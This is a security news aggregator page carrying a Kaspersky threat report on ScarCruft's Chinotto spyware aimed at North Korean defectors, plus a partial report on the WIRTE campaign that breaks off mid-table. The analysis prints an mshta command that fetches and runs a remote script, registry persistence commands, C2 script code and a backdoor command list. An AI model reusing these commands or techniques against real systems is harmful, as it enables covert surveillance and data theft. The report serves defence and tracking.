Security-Portal.cz je internetový portál zaměřený na počítačovou bezpečnost, hacking, anonymitu, počítačové sítě, programování, šifrování, exploity, Linux a BSD systémy. Provozuje spoustu zajímavých služeb a podporuje příznivce v zajímavých projektech.

Kategorie

New Chinotto Spyware Targets North Korean Defectors, Human Rights Activists

The Hacker News - 1 hodina 7 min zpět
North Korean defectors, journalists who cover North Korea-related news, and entities in South Korea are being zeroed in on by a nation-state-sponsored advanced persistent threat (APT) as part of a new wave of highly-targeted surveillance attacks. Russian cybersecurity firm Kaspersky attributed the infiltrations to a North Korean hacker group tracked as ScarCruft, also known as APT37, Reaper
Kategorie: Hacking & Security

CleanMyMac X: Performance and Security Software for Macbook

The Hacker News - 1 hodina 32 min zpět
We use Internet-enabled devices in every aspect of our lives today—to find information, shop, bank, do homework, play games, and keep in touch with friends and family. As a result, our devices contain much personal information about us. Also, any great device will get a little clunky and slow over time and the Mac is no exception, and the whole "Macs don't get viruses" claim is a myth. Malware
Kategorie: Hacking & Security

Hackers Using Compromised Google Cloud Accounts to Mine Cryptocurrency

The Hacker News - 3 hodiny 24 min zpět
Threat actors are exploiting improperly-secured Google Cloud Platform (GCP) instances to download cryptocurrency mining software to the compromised systems as well as abusing its infrastructure to install ransomware, stage phishing campaigns, and even generate traffic to YouTube videos for view count manipulation. "While cloud customers continue to face a variety of threats across applications
Kategorie: Hacking & Security

ScarCruft surveilling North Korean defectors and human rights activists

Kaspersky Securelist - 4 hodiny 20 min zpět

The ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor we first reported in 2016. ScarCruft is known to target North Korean defectors, journalists who cover North Korea-related news and government organizations related to the Korean Peninsula, between others. Recently, we were approached by a news organization with a request for technical assistance during their cybersecurity investigations. As a result, we had an opportunity to perform a deeper investigation on a host compromised by ScarCruft. The victim was infected by PowerShell malware and we discovered evidence that the actor had already stolen data from the victim and had been surveilling this victim for several months. The actor also attempted to send spear-phishing emails to the victims’ associates working in businesses related to North Korea by using stolen login credentials.

Based on the findings from the compromised machine, we discovered additional malware. The actor utilized three types of malware with similar functionalities: versions implemented in PowerShell, Windows executables and Android applications. Although intended for different platforms, they share a similar command and control scheme based on HTTP communication. Therefore, the malware operators can control the whole malware family through one set of command and control scripts.

We were working closely with a local CERT to investigate the attacker’s command and control infrastructure and as a result of this, we were able better understand how it works. The APT operator controls the malware using a PHP script on the compromised web server and controls the implants based on the HTTP parameters. We were also able to acquire several log files from the compromised servers. Based on said files, we identified additional victims in South Korea and compromised web servers that have been utilized by ScarCruft since early 2021. Additionally, we discovered older variants of the malware, delivered via HWP documents, dating back to mid-2020.

More information about ScarCruft is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Spear-phishing document

Before spear-phishing a potential victim and sending a malicious document, the actor contacted an acquaintance of the victim using the victim’s stolen Facebook account. The actor already knew that the potential target ran a business related to North Korea and asked about its current status. After a conversation on social media, the actor sent a spear-phishing email to the potential victim using a stolen email account. The actor leveraged their attacks using stolen login credentials, such as Facebook and personal email accounts, and thereby showed a high level of sophistication.

After a Facebook conversation, the potential target received a spear-phishing email from the actor. It contains a password-protected RAR archive with the password shown in the email body. The RAR file contains a malicious Word document.

Spear-phishing email and decoy

This document contains a lure related to North Korea.

MD5 File name Modified time Author Last saved user baa9b34f152076ecc4e01e35ecc2de18 북한의 최근 정세와 우리의 안보.doc

(North Korea’s latest situation and our national security) 2021-09-03 09:34:00 Leopard Cloud

This document contains a malicious macro and a payload for a multi-stage infection process. The first stage’s macro contains obfuscated strings and then spawns another macro as a second stage.

The first stage macro checks for the presence of a Kaspersky security solution on the victim’s machine by trying the following file paths:

  • C:\Windows\avp.exe # Kaspersky AV
  • C:\Windows\Kavsvc.exe # Kaspersky AV
  • C:\Windows\clisve.exe # Unknown

If a Kaspersky security solution is indeed installed on the system, it enables trust access for Visual Basic Application (VBA) by setting the following registry key to ‘1’:

HKEY_CURRENT_USER\Software\Microsoft\Office\[Application.Version]\Word\Security\AccessVBOM

By doing so, Microsoft Office will trust all macros and run any code without showing a security warning or requiring the user’s permission. Next, the macro creates a mutex named ‘​​sensiblemtv16n’ and opens the malicious file once more. Thanks to the “trust all macros” setting, the macro will be executed automatically.

If no Kaspersky security software is installed, the macro directly proceeds to decrypt the next stage’s payload. In order to achieve this, it uses a variation of a substitution method. The script compares the given encrypted string with a second string to get an index of matched characters. Next, it receives a decrypted character with an index acquired from the first string.

  • First string: BU+13r7JX9A)dwxvD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V&tC,uYz=Z0RS8aM4Fqn
  • Second string: v&tC,uYz=Z0RS8aM4FqnD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V7JX9A)dwxBU+13r

The decrypted second stage Visual Basic Application (VBA) contains shellcode as a hex string. This script is responsible for injecting the shellcode into the process notepad.exe.

Shellcode in the second stage VBA

The shellcode contains the URL to fetch the next stage payload. After fetching the payload, the shellcode decrypts it with trivial single-byte XOR decryption. Unfortunately, we weren’t able to gather the final payload when we investigated this sample.

The payload’s download path is:

hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4VHg/root/content

Host investigation

As a result of our efforts in helping the victim with the analysis, we had a chance to investigate the host of the owner who sent the spear-phishing email. When we first checked the process list, there was a suspicious PowerShell process running with a rather suspicious parameter.

This PowerShell command was registered via the Run registry key as a mechanism for persistence:

  • Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run – ONEGO
c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 300000 2.2.2.2 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html This registry key causes the HTML Application (HTA) file to get fetched and executed by the mshta.exe process every time the system is booted. The fetched ‘1.html’ is an HTML Application (.hta) file that contains Visual Basic Script (VBS), which eventually executes PowerShell commands.

The PowerShell script offers simple backdoor functionalities and continuously queries the C2 server with HTTP POST requests containing several parameters. At first, it sends a beacon to the C2 server with the host name:

hxxp://[redacted].cafe24[.]com/bbs/probook/do.php?type=hello&direction=send&id=[host name]

Next, it attempts to download commands from the C2 server with the following format:

hxxp://[redacted].cafe24[.]com/bbs/probook/do.php??type=command&direction=receive&id=

If the HTTP response from the C2 server is 200, it checks the response data and executes the delivered commands.

Delivered data Description ref: Send a beacon to the C2 server:
HTTP request: ?type=hello&direction=send&id= cmd: If the command data includes ‘start’, execute the given command with cmd.exe and send base64 encoded ‘OK’ with the following POST format. Otherwise, it executes the given command, redirecting the result to the result file (%APPDATA%\desktop.dat), and sends the contents of the file after base64 encoding.
HTTP request: ?type=result&direction=send&id=

We discovered additional malware, tools and stolen files from the victim’s host. Due to limited access to the compromised host, we were unable to figure out the initial infection vector. However, we assess this host was compromised on March 22, 2021, based on the timestamp of the suspicious files. One characteristic of the malware we discovered from the victim is the writing of execution results from commands to the file “%appdata%\desktop.dat”. According to the Master File Table (MFT) information, this file was created the same day, March 22, 2021, and the last modification time is on September 8, 2021, which means this file was used until just before our investigation.

Using the additional tools, the malware operator collected sensitive information from this victim, although we can’t assess exactly how much data was exfiltrated and what kind of data was stolen. Based on the timestamp of the folders and files created by the malware, the actor collected and exfiltrated files as early as August 2021. The log files with the .dat extension are encrypted, but can be decrypted with the one-byte XOR key 0x75. These log files contain the uploading history. We found two log files and each of them contains slightly different logs. The ‘B14yNKWdROad6DDeFxkxPZpsUmb.dat’ file contains zipping and uploading of the folder bearing the same name. The log file presents the process as: “Zip Dir Start > Up Init > Up Start > Up File Succeed > Zip Dir Succeed”. According to the log file, the malware operator collected something from the infected system in this folder and uploaded it after archiving.

File archiving and uploading log

The other log file, named “s5gRAEs70xTHkAdUjl_DY1fD.dat”, also contains a file uploading history, except for file zipping messages. It processes each file with this procedure: “Up Init > Up Start > Up File Succeed”.

File uploading log

Based on what we found from this victim, we can confirm that the malware operator collected screenshots and exfiltrated them between August 6, 2021 and September 8, 2021.  Based on what we found out from the victim, we can summarize the whole infection timeline. We suspect this host was compromised on March 22, 2021. After the initial infection, the actor attempted to implant additional malware, but an error occurred that led to the crash of the malware. The malware operator later delivered the Chinotto malware in August 2021 and probably started to exfiltrate sensitive data from the victim.

Timeline of the attack on the victim

Windows executable Chinotto

As a result of the host investigation, we discovered a malicious Windows executable and found additional malware variants from VirusTotal and our own sample collection. One of the Windows executables contains a build path and the malware author appears to call the malware “Chinotto“.

PDB path

The technical specifications in this analysis are based on the Chinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1) we discovered from the host investigation. One of the characteristics of this malware is that it contains a lot of garbage code to impede analysis. During runtime, the malware copies unused data to the allocated buffer before copying the real value; or allocates an unused buffer, filling it with meaningless data, and never uses it.

It also restores functional strings such as C2 addresses and debugging messages to the stack at runtime. The malware creates a mutex and fetches the C2 addresses, which are different for each sample we discovered:

Mutex: NxaNnkHnJiNAuDCcoCKRAngjHVUZG2hSZL03pw8Y C2 address: hxxp://luminix.openhaja[.]com/bbs/data/proc1/proc.php

In order to generate the identification value of the victim, the malware acquires both computer and user name and combines them in the format ‘%computer name%_%user name%’. Next, it encrypts the acquired string with the XOR key ‘YFXAWSAEAXee12D4’ and encodes it with base64.

The backdoor continuously queries the C2 server, awaiting commands from the malware operator. We observed an early version of Chinotto malware (MD5 55afe67b0cd4a01f3a9a6621c26b1a49) which, while it also follows this simple principle, uses a hard-coded backdoor command ‘scap’. This means this specific sample is only designed for exfiltrating the victim’s screenshot.

The Chinotto malware shows fully fledged capabilities to control and exfiltrate sensitive information from the victims.

Command Description ref: Send beacon to the C2 server:

http://[C2 URL]?ref=id=%s&type=hello&direction=send cmd: Execute Windows commands and save the result to the %APPDATA%\s5gRAEs70xTHkAdUjl_DY1f.dat file after encrypting with a one-byte XOR key down: Download file from the remote server up: Upload file state: Upload log file (s5gRAEs70xTHkAdUjl_DY1fD.dat) regstart: Copy current malware to the ​​CSIDL_COMMON_DOCUMENTS folder and execute command to register file to run registry:

“reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v a2McCq /t REG_SZ /d %s /f” cleartemp: Remove files from folder “%APPDATA%\s5gRAEs70xTHkAdUjl_DY1fD” updir: Archive directory and upload it. Archive is XOR encoded using the same key used when creating the identification value: ‘YFXAWSAEAXee12D4’ init: Collect files with following extensions from the paths CSIDL_DESKTOP, CSIDL_PERSONAL(CSIDL_MYDOCUMENTS), CSIDL_MYMUSIC, CSIDL_MYVIDEO. Downloads and upload them to C2 server:

jpg|jpeg|png|gif|bmp|hwp|doc|docx|xls|xlsx|xlsm|ppt|pptx|pdf|txt|mp3|amr|m4a|ogg|aac|wav|wma|3gpp|eml|lnk|zip|rar|egg|alz|7z|vcf|3gp scap: Take a screenshot, save it to the folder “%appdata%\s5gRAEs70xTHkAdUjl_DY1fD” in an archived format. The file to store the screenshot has an ‘e_‘ prefix and 10 randomly generated characters as a filename. When uploading the screenshot file, it uses ‘wrpdwRwsFEse’ as the filename run: Run Windows commands with ShellExecuteW API chdec: Download an encrypted file and decrypt it via CryptUnprotectData API update: Download updated malware and register it:

reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v m4cVWKDsa9WxAWr41iaNGR /t REG_SZ /d %s /f wait: Sleep for 30 minutes wakeup: Wake up after 2.5 seconds

Another malware sample (MD5 04ddb77e44ac13c78d6cb304d71e2b86) that demonstrated a slight difference during runtime was discovered from the same victim. This is the same fully featured backdoor, but it loads the backdoor command using a different scheme. The malware checks for the existence of a ‘*.zbpiz’ file in the same folder. If it exists, it loads the file’s content and uses it as a backdoor command after decrypting. The malware authors keep changing the capabilities of the malware to evade detection and create custom variants depending on the victim’s scenario.

In addition, there are different Windows executable variants of the Chinotto malware. Apart from the conventional Chinotto malware mentioned above, a different variant contains an embedded PowerShell script. The spawned PowerShell command has similar functionality to the PowerShell we found from the victim. However, it contains additional backdoor commands, such as uploading and downloading capabilities. Based on the build timestamp of the malware, we assess that the malware author used the PowerShell embedded version from mid-2019 to mid-2020 and started to use the malicious, PowerShell-less Windows executable from the end of 2020 onward.

Android Chinotto

Based on the C2 communication pattern, we discovered an Android application version of Chinotto malware (MD5 56f3d2bcf67cf9f7b7d16ce8a5f8140a). This malicious APK requests excessive permissions according to the AndroidManifest.xml file. To achieve its purpose of spying on the user, these apps ask users to enable various sorts of permissions. Granting these permissions allows the apps to collect sensitive information, including contacts, messages, call logs, device information and audio recordings. Each sample has a different package name, with the analyzed sample bearing “com.secure.protect” as a package name.

The malware sends its unique device ID in the same format as the Windows executable version of Chinotto.

Beacon URI pattern: [C2 url]?type=hello&direction=send&id=[Unique Device ID]

Next, it receives a command after the following HTTP request:

Retrieve commands: [C2 url]?type=command&direction=receive&id=[Unique Device ID]

If the delivered data from the C2 server is not “ERROR” or “Fail”, the malware starts to carry out backdoor operations.

Command URI pattern Description ref: ?type=hello&direction=send&id= Send the same beacon request to the C2 server down ?type=file&direction=send&id= Upload the temporary file (/sdcard/.temp-file.dat) to the C2 server and remove it from local storage. UriP ?type=file&direction=send&id= Save temporary file path to the result file (/sdcard/result-file.dat) and upload the temporary file. UploadInfo ?type=hello&direction=send&id=

?type=file&direction=send&id= After sending a beacon, collect the following information to the /icloud/tmp-web path:

  • Info.txt: Phone number, IP address, SDK version (OS version), Temporary file path
  • Sms.txt: Save all text messages with JSON format
  • Calllog.txt: Save all call logs with JSON format
  • Contact.txt: Save all contact lists with JSON format
  • Account.txt: Save all account information with JSON format

Upload collected file after archiving. The archived file is encrypted by AES with the key “3399CEFC3326EEFF”. UploadFile ?type=file&direction=send&id= Execute command ‘cd /sdcard;ls -alR’, save the result to the temporary file (/sdcard/.temp-file.dat) and upload it. Upload all thumbnails and photos after encrypting via AES and the key “3399CEFC3326EEFF”. ETC ?type=file&direction=send&id= Execute command saving the result to the result file (/sdcard/result-file.dat)
and upload the result
?type=file&direction=send&id

We found that the actor had an interest in a more specific file list in one variant (MD5 cba17c78b84d1e440722178a97886bb7). The ‘UploadFile’ command of this variant uploads specific files to the C2 server.  The AMR file is an audio file generally used for recording phone calls. Also, Huawei cloud and Tencent services are two of the targets. To surveil the victim, the list includes target folders as well as /Camera, /Recordings, /KakaoTalk (a renowned Korean messenger), /문건(documents), /사진(pictures) and /좋은글(good articles).

Targeted files and folders

To sum up, the actor targeted victims with a probable spear-phishing attack for Windows systems and smishing for Android systems. The actor leverages Windows executable versions and PowerShell versions to control Windows systems. We may presume that if a victim’s host and mobile are infected at the same time, the malware operator is able to overcome two-factor authentication by stealing SMS messages from the mobile phone. After a backdoor operation with a fully featured backdoor, the operator is able to steal any information they are interested in. Using the stolen information, the actor further leverages their attacks. For example, the group attempts to infect additional valuable hosts and contact potential victims using stolen social media accounts or email accounts.

Attack procedure

Older malicious HWP documents

The threat actor behind this campaign delivered the same malware with a malicious HWP file. At that time, lures related to COVID-19 and credential access were used.

HWP hash HWP file name Dropped payload hash f17502d3e12615b0fa8868472a4eabfb 코로나19 재감염 사례-백신 무용지물.hwp
(Covid-19 reinfection case-Useless vaccine.hwp) 72e5b8ea33aeb083631d1e8b302e76af
(Visual Basic Script) c155f49f0a9042d6df68fb593968e110 계정기능 제한 안내.hwp
(Notice of limitation of account.hwp) 5a7ef48fe0e8ae65733db64ddb7f2478
(Windows executable)

The Visual Basic Script created by the first HWP file (MD5 f17502d3e12615b0fa8868472a4eabfb) has similar functionalities to the Chinotto malware. It also uses the same HTTP communication pattern. The second payload dropped from the malicious HWP is a Windows executable executing an embedded PowerShell script with the same functionalities. These discoveries reveal related activity dating back to at least mid-2020.

Infrastructure

In this campaign, the actor relied solely on compromised web servers, mostly located in South Korea. During this research we worked closely with the local CERT to take down the attacker’s infrastructure and had a chance to look into one of the scripts on the C2 servers that control the Chinotto malware. The C2 script (named “do.php”) uses several predefined files to save the client’s status (shakest) and commands (comcmd). Also, it parses several parameters (id, type, direction, data) delivered by the HTTP request from the implant:

$type = ""; # 'type' parameter $shakename = "shakest"; # Save client status $comcmdname = "comcmd"; # Save commands $btid = ""; # Client unique ID $direction = ""; # 'direction' parameter $data = ""; # 'data' parameter if (isset($_GET['id'])){ $btid = $_GET['id']; } if (isset($_GET['type'])){ $type = $_GET['type']; } if (isset($_GET['direction'])){ $direction = $_GET['direction']; } if (isset($_GET['data'])){ $data = $_GET['data']; .. $comname = $btid.""; $comresname = $comname . "-result";

In order to control the client, the C2 script uses HTTP parameters. First, it checks the value of the ‘type’ parameter. The ‘type’ parameter carries four values: hello, command, result, and file.

Value of ‘type’ param Description hello Report and control the client status command Hold the command from the operator or retrieve the command from the client result Upload the command execution result or retrieve the command file Upload file to the C2 server ‘hello’ type

When the script receives the ‘type=hello’ parameter, it checks the value of ‘direction’. In this routine, the script checks the status of the client. The malware operator saves the client status to a specific file, the ‘shakest’ file in this case. If the ‘send’ value is being received, the client status is set to ‘ON’. If ‘receive’ is set as well, the client’s status log file is sent (likely in order to send the status of clients to the malware operator). The ‘refresh’ value is for setting all clients to ‘OFF’ and ‘release’ is used to initialize the command file. The client just replies ‘OK’.

‘type=hello’ commands

‘command’ type

In order to manage the implant’s commands, the C2 script handles several additional parameters. If the ‘type=command’ alongside ‘direction=receive’ is set, it issues a request from the client to retrieve a command.

There are two kinds of command files: common commands like an initial command or commands sent to all clients, and individual commands for a specific client. If an individual command exists for a client, it delivers it. Otherwise, the client is sent a common command. If the ‘direction’ parameter is set to ‘send’, the request is coming from the malware operator in order to save the sent command in the C2 server. Using this request, the operator can set two commands files: common command or individual command. If the ‘botid’ parameter contains ‘cli’, it means this request is for setting a common command file. If the ‘data’ parameter contains ‘refclear:’, the common command file gets initialized. Otherwise, the ‘data’ value is saved to the common command file. If ‘botid’ is not ‘cli’, it means this request is directed to an individual command file. The process of saving the individual command file is the same as the process used for saving the common command.

type=command commands

‘result’ type

When uploading command execution results coming from the implant, the script sets the ‘type’ parameter to ‘result’. If the ‘direction’ parameter equals ‘send’, it saves the value of the ‘data’ parameter to the individual result file: “[botid]-result. The ‘receive’ value of the ‘direction’ parameter means retrieving the individual result file. The script then sends the result file to the operator after encoding it with base64.

‘file’ type

The last possible ‘type’ command is ‘file’. This value is used for exfiltrating files from the victim. If a file upload succeeds, the script sends the message ‘SEND SUCCESS’. Otherwise, it sends ‘There was an error uploading the file, please try again!’.

We discovered that the malware operator used a separate webpage to monitor and control the victims. From several compromised C2 servers we see a control page carrying a ‘control.php’ file name.

Control page from this case

The control page shows a simple structure. The operator can see a list of infected hosts in the left panel with the corresponding status “ON” or “OFF”. Based on this information, the operator is able to issue a command using the right panel and watch the result from the client.

Victims

We began this research by providing support to human rights activists and defectors from North Korea against an actor seeking to surveil and track them.

Additionally, we discovered further victims we couldn’t profile from analyzing the C2 servers. From analyzing the attacker’s infrastructure, we found 75 client connections between January 2021 and February 2021. Most IP addresses seem to be Tor or VPN connections, which are likely to be either from researchers or the malware operators.

Analyzing other C2 servers, we found more information about possible additional victims. Excluding connections coming from Tor, there are only connections coming from South Korea. Based on the IP addresses, we could distinguish four different suspected victims located in South Korea, and determine their operating system and browser used based on user-agent information:

Victim A connected to the C2 server from July 16 to September 5 and has outdated versions of Windows OS and Internet Explorer. Victim B connected to this server on September 4 and operates Windows 8 and Internet Explorer 10. While we were investigating the C2 server, Victim D kept connecting to it, using Windows 10 with Chrome version 78.

Timeline of victims

To sum up, this campaign is targeting entities in South Korea, which is a top point of interest for ScarCruft. Based on our findings, we also assume that the threat actor targeted individuals rather than specific companies or organizations.

Attribution

We discovered several code overlaps with old ScarCruft malware named POORWEB. At first, when Chinotto malware uploads the file to the C2 server, it uses the HTTP POST request with a boundary generated with a random function. When Chinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1) generates a boundary value, it executes the random() function twice and concatenates each value. The generation process is not exactly the same, but it utilizes a similar scheme as the old POORWEB malware (MD5 97b35c34d600088e2a281c3874035f59).

HTTP boundary generation routine

Moreover, there is additional code overlap with Document Stealer malware (MD5 cff9d2f8dae891bd5549bde869fe8b7a) that was previously utilized with POORWEB malware. When the Chinotto malware checks the response from the C2 server, it checks whether the response is ‘HTTP/1.1 200 OK’ and not ‘error’. This Document Stealer malware also has the same routine to check responses from the C2 server.

C2 response check routine

Apart from code similarity, historically, ScarCruft group is known to surveil individuals related to North Korea such as journalists, defectors, diplomats and government employees. The target of this attack is within the same scope as previous ScarCruft group campaigns. Based on the victimology and several code overlaps, we assess with medium confidence that this cyber-espionage operation is related to the ScarCruft group.

Conclusions

Many journalists, defectors and human rights activists are targets of sophisticated cyberattacks. Unlike corporations, these targets typically don’t have sufficient tools to protect against and respond to highly skilled surveillance attacks. One of the purposes of our team is to help individuals targeted by APT groups. This research stemmed from this kind of endeavor. Our collaboration with the local CERT allowed us to gain a unique look into ScarCruft’s infrastructure setup and allowed us to discover many technical details.

Using these findings, we found additional Android variants of the same malware, which has been invaluable in understanding and tracking ScarCruft TTPs. Moreover, while hunting for related activity, we uncovered an older set of activity dating back to mid-2020, possibly indicating that ScarCruft operations against this set of individuals have been operating for a longer period of time.

Indicators of compromise

Malicious documents

baa9b34f152076ecc4e01e35ecc2de18 북한의 최근 정세와 우리의 안보.doc 7d5283a844c5d17881e91a5909a5af3c 화학원료.doc (similar document)

HTA file

e9e13dd4434e2a2392228712f73c98ef 1.html

Windows executable Chinotto

00df5bbac9ad059c441e8fef9fefc3c1 alyakscan.exe 04ddb77e44ac13c78d6cb304d71e2b86 anprotect5.exe 55afe67b0cd4a01f3a9a6621c26b1a49 93bcbf59ac14e14c1c39a18d8ddf28ee

PowerShell embedded Chinotto

c7c3b03108f2386022793ed29e621343
5a7ef48fe0e8ae65733db64ddb7f2478
b06c203db2bad2363caed1c0c11951ae
f08d7f7593b1456a087eb9922507c743
0dd115c565615651236fffaaf736e377
d8ad81bafd18658c52564bbdc89a7db2

Android application Chinotto

71b63d2c839c765f1f110dc898e79d67
c9fb6f127ca18a3c2cf94e405df67f51
3490053ea54dfc0af2e419be96462b08
cba17c78b84d1e440722178a97886bb7
56f3d2bcf67cf9f7b7d16ce8a5f8140a

Payload hosting URLs

hxxps://api[.]onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4VHg/root/content
hxxp://www[.]djsm.co[.]kr/js/20170805[.]hwp

Command and control server

hxxp://luminix[.]openhaja[.]com/bbs/data/proc1/proc[.]php
hxxp://luminix[.]kr/bbs/data/proc/proc[.]php
hxxp://kjdnc[.]gp114[.]net/data/log/do[.]php
hxxp://kumdo[.]org/admin/cont/do[.]php
hxxp://haeundaejugong[.]com/editor/chinotto/do[.]php
hxxp://haeundaejugong[.]com/data/jugong/do[.]php
hxxp://doseoul[.]com/bbs/data/hnc/update[.]php
hxxp://hz11[.]cn/jquery-ui-1[.]10[.]4/tests/unit/widget/doc/pu[.]php

MITRE ATT&CK mapping Tactic Technique Technique Name         Resource Development T1584.006 Compromise Infrastructure: Web Services Initial Access T1566.001 Phishing: Spear-phishing Attachment Execution T1059.001

T1059.005 Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: Visual Basic Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder Defense Evasion T1140

T1036.005 Deobfuscate/Decode Files or Information

Masquerading: Match Legitimate Name or Location Discovery T1033

T1082 System Owner/User Discovery

System Information Discovery Collection T1113

T1560.002 Screen Capture

Archive Collected Data: Archive via Library Command and Control T1071.001

T1573.001 Application Layer Protocol: Web Protocols

Encrypted Channel: Symmetric Cryptography Exfiltration T1041 Exfiltration Over C2 Channel

Podvodníci se vydávají za pracovníky Europolu

Novinky.cz - bezpečnost - 5 hodin 35 min zpět
Podvodníci v e-mailech a zprávách na sociálních sítích zneužívají jména a loga zástupců Europolu, což je agentura Evropské unie pro spolupráci v oblasti prosazování práva. Používají přitom jména výkonné ředitelky Catherine De Bolleové, jejího zástupce Jean-Philippe Lecouffa a dalších představitelů mezinárodních orgánů vymáhajících právo. Upozornila na to mluvčí policejního prezidia Hana Rubášová.
Kategorie: Hacking & Security

WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019

Kaspersky Securelist - 6 hodin 20 min zpět

Overview

This February, during our hunting efforts for threat actors using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant. The implant itself is a VBS script with functionality to collect system information and execute arbitrary code sent by the attackers on the infected machine.

Although these intrusion sets may appear similar to the new MuddyWater first stage VBS implant used for reconnaissance and profiling activities, which we described recently in a private report, they have slightly different TTPs and wider targeting. To date, most of the known victims are located in the Middle East, but there are also targets in other regions. Various industries are affected by this campaign. The main focus is on government and diplomatic entities, though we also noticed an unusual targeting of law firms and financial institutions.

We attribute this campaign with high confidence to an actor named WIRTE, which is a lesser-known threat actor first publicly referenced by our colleagues at Lab52 in 2019. We further suspect, with low confidence, that the WIRTE group has relations with the Gaza Cybergang threat actor.

Gaining an initial foothold

In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel/Word document. The Excel droppers observed in all instances were using Excel 4.0 macros – a technique that uses formulas in hidden spreadsheets or cells that execute macro 4.0 commands – to drop malware that in our particular case was named Ferocious dropper. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority.

However, in some cases we saw a fake ‘Kaspersky Update Agent’ executable acting as a dropper for the VBS implant. We were unable to confirm if this PE file was also distributed through email or downloaded by the threat actor after some initial penetration, but our analysis shows it has the same execution flow as the Excel 4.0 macros.

Sample VBS dropper Excel and Word documents, and executable

Exploitation, installation and persistence Ferocious dropper

This first stage implant is composed of VBS and PowerShell scripts. The actor used some interesting new techniques in the dropper’s execution flow. Below, we break it down into three parts:

  1. Ferocious dropper: The Excel dropper, after the user opens it and disables the protected mode, will execute a series of formulas placed in a hidden column. Initially, they will hide the main spreadsheet that requested the user to “enable editing”, then unhide a secondary spreadsheet that contains the decoy, to avoid raising suspicion. The dropper will then run formulas from a third spreadsheet with hidden columns. The infection process will start by running three basic anti-sandbox checks using the Excel 4.0 function “GET.WORKSPACE”, with three integers:

    • 1: Get the name of the environment in which Microsoft Excel is running, as text, followed by the environment’s version number. The result will then be compared to a predefined Windows version in a hidden cell, for example: Windows (64-bit) NT :.00, Windows (64-bit) NT 6.01, Windows (32-bit) NT 10.00, Windows (32-bit) NT 6.02.

    • 19: Check if a mouse is present.

    • 42: Check if the host computer is capable of playing sounds.

      If any of the above checks fail, or if the Windows environment matches any of the aforementioned versions predefined in the document (different documents have different predefined versions), the process will halt. Otherwise, the macro will open a temporary %ProgramData%\winrm.txt file and save a VBS stager to %ProgramData%\winrm.vbs and set up registry keys for persistence.

  2. Ferocious run-1: After the macro finishes writing to disk, it runs winrm.vbs using explorer.exe. In turn, the VBS script will write an embedded PowerShell snippet to a predefined filename that varies between samples, for instance, %ProgramData%\regionh.txt. The VBS script will also add two important registry keys for persistence.

    The persistence technique observed in all intrusions uses COM hijacking. In this technique, the threat actor is able to add a Class ID in the current user registry hive (HKCU) referencing the malicious VBS script written previously to %ProgramData%\winrm.vbs. This registry modification will effectively invoke the malicious VBS script any time a program or script references “Scripting.Dictionary” COM programs during their execution.

    In our analysis and testing, the WinRM Scripting API that is called by the legitimate Windows VBS scripts “C:\Windows\System32\winrm.vbs” or “C:\Windows\SysWOW64\winrm.vbs”, are able to trigger the persistence mechanism smoothly. Microsoft’s command line licensing tool slmgr.vbs is also able to provide similar results. Both winrm.vbs and slmgr.vbs were leveraged across different intrusions. The mechanism through which these scripts are invoked during the boot process is described in a later section.

    Registry keys used for COM hijacking

    After the above execution chain, the Excel 4.0 macro will clean up and delete the winrm.vbs and winrm.txt files.

  3. Ferocious run-2: The macro will continue after the cleanup by recreating and opening the same files, winrm.vbs and winrm.txt. However, this time it writes a PowerShell one-liner wrapped with VB code temporarily into %ProgramData%\winrm.txt and then saved into %ProgramData%\winrm.vbs. This one-liner acts as a stager for the PowerShell snippet written in regionh.txt mentioned above. Once successful, the macro invokes %ProgramData%\winrm.vbs again using explorer.exe, which in turn will execute the PowerShell snippet that connects to the C2 server and which we named LitePower Stager.
LitePower stager

The implant is a small PowerShell script that acts as a downloader and secondary stager used to execute commands provided by its C2, and possibly download and deploy further malware.

LitePower PowerShell implant

This script is able to connect with the embedded C2 domain using predefined HTTP settings such as a unique User-Agent:

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0

Interestingly, and across the different incidents we observed, the “rv” field of the user agent has changed. In the example above, it is FTS_06. However, we have seen more than 10 variations (listed in the IoC section). We suspect these are used to track intrusions.

If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. If the threat actor succeeds in establishing C2 communications using LitePower, further payloads containing system commands are sent back to the victim in the form of PowerShell functions through HTTP GET requests, and the command results are sent back as HTTP POST requests to the C2 server. The GET requests will be parsed by LitePower and invoked using PowerShell’s IEX function.

The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege. This is followed by the creation of a legitimate scheduled task to trigger “Scripting.Dictionary” COM programs; this will become the cornerstone that allows the persistence to work using the COM hijacking technique and the registry keys added during the installation phase described above.

Sample scheduled task settings referencing SLMGR.VBS to trigger WINRM.VBS through COM hijacking

The commands observed during the different intrusions are summarized below:

Command Description Get-WmiObject Win32_logicaldisk -Filter ‘DeviceID=”C:”’ |
